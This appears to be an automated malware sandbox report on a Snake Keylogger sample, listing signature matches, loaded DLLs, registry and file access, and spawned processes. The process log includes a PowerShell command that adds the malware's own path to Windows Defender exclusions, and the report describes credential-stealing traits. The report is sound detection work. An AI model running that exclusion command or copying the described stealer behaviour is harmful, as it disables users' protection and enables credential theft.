Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: .05.2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, Z.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, Z.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, Z.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, Z.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, -.cs	Base64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, -.cs	Base64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'

Source: 4.2..05.2024.exe.348b390.4.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	Security API names: _0020.SetAccessControl
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	Security API names: _0020.AddAccessRule
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, Sd89SSZIrH09kTbk8x.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, Sd89SSZIrH09kTbk8x.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	Security API names: _0020.SetAccessControl
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@4/3

Source: C:\Users\user\Desktop\.05.2024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\.05.2024.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Users\user\Desktop\.05.2024.exe	Mutant created: \Sessions\1\BaseNamedObjects\FeyyVXOsOYgsUnvEbEbwPXDq

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ombvvhhf.taa.ps1

Jump to behavior

Source: .05.2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: .05.2024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\.05.2024.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: .05.2024.exe, 0000000A.00000002.3752435233.000000000375E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: .05.2024.exe

ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\.05.2024.exe "C:\Users\user\Desktop\.05.2024.exe"
Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Users\user\Desktop\.05.2024.exe "C:\Users\user\Desktop\.05.2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Users\user\Desktop\.05.2024.exe "C:\Users\user\Desktop\.05.2024.exe"	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\.05.2024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: .05.2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: .05.2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

